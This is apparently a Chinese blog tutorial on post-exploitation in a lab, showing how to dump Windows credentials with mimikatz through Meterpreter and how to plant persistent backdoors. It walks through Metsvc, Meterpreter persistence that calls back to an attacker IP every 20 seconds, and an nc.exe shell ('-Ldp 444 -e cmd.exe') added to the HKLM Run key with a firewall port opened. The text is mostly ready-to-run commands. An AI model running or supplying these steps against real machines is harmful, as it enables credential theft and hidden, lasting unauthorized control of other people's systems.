内网渗透系列-mimikatz的使用以及后门植入
文章目录
- 内网渗透系列-mimikatz的使用以及后门植入
- 前言
- mimikatz的使用
- 后门植入
-
- msf永久后门植入
-
- (1)Meterpreter后门:Metsvc
- (2)Meterpreter后门:Persistence
- NC后门
- 后记
前言
内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持着权限,我们需要进行权限的维持,保持着下一次靶机登录时,我只需要监听端口,就可以获取对方的shell了。这就是我们今天说的后门植入的内容了。
mimikatz的使用
讲解后门植入的内容之前,我们先简单介绍一下mimikatz的用法,实际场景中我们可以反弹shell到cs中进行横向移动,使用自带的提权和mimikatz的模块进行获取用户的密码。
mimikatz的使用
(使用规则是:必须是管理员或者system权限才可以使用)
首先拿到会话以及system权限后,在加载插件
load mimikatz
help mimikatz
msv(导出哈希值)
用户名和密码哈希值
wdigest
直接获取的账号的明文密码
kerberos信息
也可以找出账号的明文密码
原来的命令
mimakatz_commend -h
mimakatz_commend -f
mimakatz_commend -f a::(写错误的指令,报出帮助信息)
会出现各个模块,比如
mimakatz_commend system::
mimakatz_commend system::user
获取哈希值
mimakatz_commend samdump::hashes
mimakatz_commend -f process::list(列出当前的进程信息)
mimakatz_commend -f service::list(列出当前的服务进程)
想在靶机上打开一个cmd的窗口,就输入
mimakatz_commend -f nogpo::
mimakatz_commend -f nogpo::cmd
mimakatz_commend -f nogpo::regedit
获取认证信息
mimakatz_commend -f sekurlsa::
mimakatz_commend -f sekurlsa::wdigest(获取明文信息)
mimakatz_commend -f sekurlsa::logonPasswords(获取用户的登录密码)
权限提升
mimakatz_commend -f privilege::
mimakatz_commend -f privilege::debug
破解扫雷游戏
mimakatz_commend -f minesweeper::infos
后门植入
msf永久后门植入
讲解方法之前,我们先了解一下为什么要生成后门
- 1.meterpretere shell运行与内存中,重启后失效
- 2.避免重复性的渗透工作
- 3.漏洞修复后仍旧可就维持控制
两种方法生成后门:
(1)Meterpreter后门:Metsvc
通过服务启动
进入会话后
run metsvc -h
run metsvc -A //设定端口,上传后门文件
会在以下路径生成服务
C:\Users\zhian2\AppData\Local\Temp\tjPfsdnGycGdiM
这个服务是上传上去了,但没有显示在进程中,
我来讲解一下步骤吧
首先进入会话
上传成功,我们到靶机上查看上传的文件
服务已启动,但是在win7上执行metsvc.exe执行不了。
在这里我由于关掉了防火墙后uac,所以直接就get到system权限,之前得不到系统权限,是因为uac和防火墙的原因,所以想要提权的话,还是得绕过uac,或者直接上线cs,直接利用模块获取system的权限。
(2)Meterpreter后门:Persistence
通过启动型启动
特性:定期回连,系统 启动是回连,自动运行
Run persistence -A -S -U -i 20 -p 4321 -r 192.168.101.102
Run persistence -A -X -i 20 -p 4321 -r 192.168.101.102
(其中-A是生成的程序,-X是自动连接,-i是延时时间,-p是对应的端口,-r是kali的ip地址)
在这里给大家介绍第二种方法,比较好用,重启之后还是可以回连会话的。我们来尝试一下,步骤如下:
run persistence -A -X -i 20 -p 666 -r 192.168.101.102
background
jobs
过了20秒后又会返回一个会话
我们删掉进程后,过了20秒,他有返回了一个会话了
sessions -k 9
我们就获得了system权限了
我们重启后,等待20秒,输入sessions查看会话,就会发现出现了新的会话了,或者再等一会,他自己就会回连一个会话了。
我们输入sessions -i 13,获取会话,getuid,getsystem,最终获得了system权限了。
NC后门
我先把大概的步骤给大家看一下,接下来就要开始演示了。
(3)NC后门
上传nc
Upload /rootnc.exe C:\windows\system32
修改注册表
- 枚举注册表键值:
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run - 在当前主键下增加一个nc 键值:
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’ - 查看nc键值:
reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc
设置防火墙
- 开启有一个cmd通道
execute -f cmd -i -H - 查看防火墙状态
Netsh firewall show opmode - 添加防火墙规则允许444端口通过
netsh firewall add portopening TCP 444 “Service Firewall” ENABLE - 查看端口状态
Netsh firewall show portopening
开始连接
nc -v ip port
具体步骤如下:
首先在kali的桌面上传一个nc.exe,或者放在/home/zhian/nc.exe
upload /home/zhian/nc.exe c:\windows\system32
枚举注册表键值:
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
在当前主键下增加一个nc 键值:
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’(-d表示要执行的内容)
查看nc键值:
reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc
execute -f cmd -i -H(-H表示要开启一个cmd的窗口)
查看防火墙状态
Netsh firewall show opmode
添加防火墙规则允许444端口通过
netsh firewall add portopening TCP 444 “Service Firewall” ENABLE
查看端口状态
Netsh firewall show portopening
我们重启win7后,进程中就出现了nc.exe的进程,我们只需要监听即可
在kali上输入nc 192.168.101.102 444,就返回shell了
实验到这里就结束了,后续有学习内网渗透方面的知识,会给大家更新的,大家要好好复习呀。
后记
这只是内网渗透的冰山一角,也只是权限维持的一部分。内网如果要更深入的话,会涉及很多横向移动,权限提升方面的知识。最常见的就是路由和代理配置的问题,在往期文章都有提及到,大家可以看看我往期写的文章,好好复习一下吧。